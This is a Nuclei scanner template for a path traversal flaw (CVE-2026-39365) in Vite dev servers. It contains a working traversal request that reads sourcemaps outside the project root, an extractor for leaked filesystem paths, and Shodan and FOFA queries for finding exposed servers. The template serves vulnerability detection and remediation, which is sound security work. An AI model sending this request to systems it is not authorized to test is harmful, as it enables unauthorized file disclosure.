id: CVE-2026-39365

info:
  name: Vite Dev Server - Path Traversal in Optimized Deps .map Handling
  author: theamanrawat
  severity: medium
  description: |
    Vite development server versions prior to 8.0.5, 7.3.2, and 6.4.2 are vulnerable to path traversal through the optimized dependencies sourcemap handler. The dev server's handling of .map requests for optimized dependencies resolves file paths via normalizePath(path.resolve(root, url.slice(1))) and calls readFile without restricting ../ segments in the URL. This allows an attacker to bypass server.fs.strict and retrieve auto-generated sourcemaps for files located outside the project root, leaking absolute filesystem paths. Only dev servers explicitly exposed to the network using --host or server.host are affected.
  impact: |
    An attacker can trigger auto-generated sourcemap responses for files outside the project directory, leaking absolute filesystem paths and potentially reading .map files containing sensitive source code or configuration data.
  remediation:
    Upgrade Vite to version 8.0.5, 7.3.2, 6.4.2 or later.
  reference:
    - https://github.com/advisories/GHSA-4w7w-66w2-5vf9
    - https://github.com/vitejs/vite/security/advisories/GHSA-4w7w-66w2-5vf9
    - https://nvd.nist.gov/vuln/detail/CVE-2026-39365
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-39365
    epss-score: 0.02283
    epss-percentile: 0.84973
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"/@vite/client" port:"5173"
    fofa-query: body="/@vite/client" && port="5173"
  tags: cve,cve2026,vite,lfi,path-traversal,vuln,unauthenticated,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - "/@vite/client"
        internal: true

      - type: status
        status:
          - 200
        internal: true

  - raw:
      - |
        GET /node_modules/.vite/deps/../../../config.production.js.map HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\"version\":3"
          - "\"mappings\""
        condition: and

      - type: regex
        part: body
        regex:
          - "\"file\":\"/"

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - "\"file\":\"([^\"]+)\""
# digest: 4a0a00473045022047d5a310567db68bdc2c04dca55d9d2daac4e842880271fea1b99f460b1b2bfc0221008f221fdab5a10c4d1dffe3137379656c6bdddc713a06df3b7a54b17050dd31b4:922c64590222798bb761d5b6d8e72950